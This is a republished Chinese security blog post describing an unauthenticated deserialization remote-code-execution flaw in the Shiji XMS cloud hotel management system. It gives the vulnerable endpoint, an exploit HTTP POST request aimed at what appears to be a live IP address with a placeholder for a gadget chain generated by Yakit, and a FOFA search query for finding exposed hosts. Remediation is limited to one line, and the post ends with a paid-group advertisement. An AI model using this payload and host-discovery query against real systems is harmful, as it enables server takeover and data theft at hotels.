西软云XMS 反序列化RCE
2023-12-30 12:16:7 Author: 棉花糖网络安全圈(查看原文) 阅读量:163 收藏

最近很多小伙伴反馈看不到最新的推文,由于微信公众号推送机制改变了,解决办法:

给公众号设为星标

点我加入交流群获得第一时间更新通知
防失联+棉花糖私人公众号

棉花糖博客地址

www.mhtsec.com

漏洞详情

01

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。
西软云XMS /fox-invoker/FoxLookupInvoker接口处存在反序列化漏洞,未经身份认证的攻击者可利用此漏洞执行任意代码,获取服务器权限。

影响版本

02

全版本

漏洞复现

03

payload

POST /fox-invoker/FoxLookupInvoker/?return-exception=true HTTP/1.1Host: 121.31.110.156:8090User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Connection: close {{hexdec(cb18x的序列化链)}
可使用yakit直接生成序列化链

fofa语法

04

app="shiji-西软云XMS"

修复建议

05

升级至安全版本

打个广告

人太懒

放在这里一大篇也让大家心烦

有兴趣自己点开看吧👇

付费群介绍

END

那么又到了文末我们应该?

1、关注!点赞!转发!

2、点我查看付费群介绍!

3、封面获取请后台回复:20231230封面


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5NTYwMDIyOA==&mid=2247500771&idx=1&sn=16a8675cf27027d2a440fc8f03bed116&chksm=c1dd255c2cf324f9ea4dc80a12f0fa2dc1abf4daa35e84a274b6c4c1e3d281ee40d8142392a8&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh